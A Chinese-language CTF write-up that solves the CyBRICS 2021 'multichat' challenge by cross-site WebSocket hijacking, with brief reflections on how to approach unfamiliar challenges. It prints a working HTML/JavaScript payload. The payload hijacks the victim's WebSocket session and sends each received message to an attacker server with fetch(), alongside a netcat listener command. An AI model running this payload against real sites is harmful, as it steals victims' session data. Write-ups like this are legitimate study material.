0 前言
这是一个 CSRF 的题目,以前没怎么做过这类题目,还是挺有趣的。HackTrick 中介绍对于这种Cross-site WebSocket hijacking 的介绍挺详细的。传送门
1 题解
- 在服务器创建文件 w.html(记得将 IP 替换为自己服务器的 IP)
<meta charset="utf-8">
<script>
function ws(){
var ws = new WebSocket("ws://multichat-cybrics2021.ctf.su/ws");
// 连接成功后的回调函数。
ws.onopen = function(event){
// 发送数据
ws.send("Hey, i forgot the flag. Can you remind me?")
}
// 实例对象的onmessage属性,用于指定收到服务器数据后的回调函数
ws.onmessage = function(event){
fetch('http://xxx.xxx.xxx.xxx:9999?' + event.data, {mode: 'no-cors'})
}
}
// 调用方法
ws();
</script>
使用 python3 -m http.server 8080 搭建临时 web 服务,并运行 nc -lvnp 9999 监听请求。
- 在后台( http://multichat-cybrics2021.ctf.su:5000/ ) 提交 w.html 的 url。即可获得 flag。


2 总结
其实重要的收获不是知识点,而是思想。在比赛前并没有做过这类题目,看完前端的源码之后可以搜索相关的技术和相关的漏洞利用,再结合题目可能的考点是什么。最后再尝试进行解题。
再者就是收集优质的漏洞利用的网站挺重要的,下面是我常用的几个网站
其他小工具类的网站不一一列举了。
版权声明:本文为qq_43085611原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。